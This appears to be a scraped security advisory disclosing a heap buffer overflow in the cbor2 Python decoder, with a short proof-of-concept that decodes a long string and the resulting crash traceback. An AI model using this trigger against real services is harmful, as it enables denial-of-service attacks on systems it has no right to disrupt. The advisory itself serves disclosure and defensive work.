Potential buffer overflow in CBOR2 decoder

Summary

Ever since #204 (or specifically 387755e) was merged, I can create a reproducible crash when running the snippet under PoC on a current Debian bullseye aarm64 on a Raspberry Pi 3 (I was not able to reproduce this on my x86_64 Laptop with Python 3.11; I suspect because there is enough memory to allocate still)

Details

PoC

import json
import concurrent.futures
import cbor2

def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)

with concurrent.futures.ProcessPoolExecutor() as executor:
    future = executor.submit(test)
    print(future.result())

malloc(): unsorted double linked list corrupted
Traceback (most recent call last):
  File "test.py", line 14, in <module>
    print(future.result())
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 440, in result
    return self.__get_result()
  File "/usr/lib/python3.9/concurrent/futures/_base.py", line 389, in __get_result
    raise self._exception
concurrent.futures.process.BrokenProcessPool: A process in the process pool was terminated abruptly while the future was running or pending.

If one calls it without the indirection via the pool executor, a SystemError is shown that hides the buffer overflow.

import json
import cbor2

def test():
    obj = "x" * 131128
    cbor_enc = cbor2.dumps(obj)
    return cbor2.loads(cbor_enc)

print(test())

Traceback (most recent call last):
  File "test.py", line 12, in <module>
    print(test())
  File "test.py", line 9, in test
    return cbor2.loads(cbor_enc)
SystemError: <built-in function loads> returned NULL without setting an error

Impact

An attacker can crash a service using cbor2 to parse a CBOR binary by sending a long enough object.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Potential buffer overflow in CBOR2 decoder

Package

Affected versions

Patched versions

Description

Summary

Details

PoC

Impact

Severity

CVE ID

Weaknesses

Credits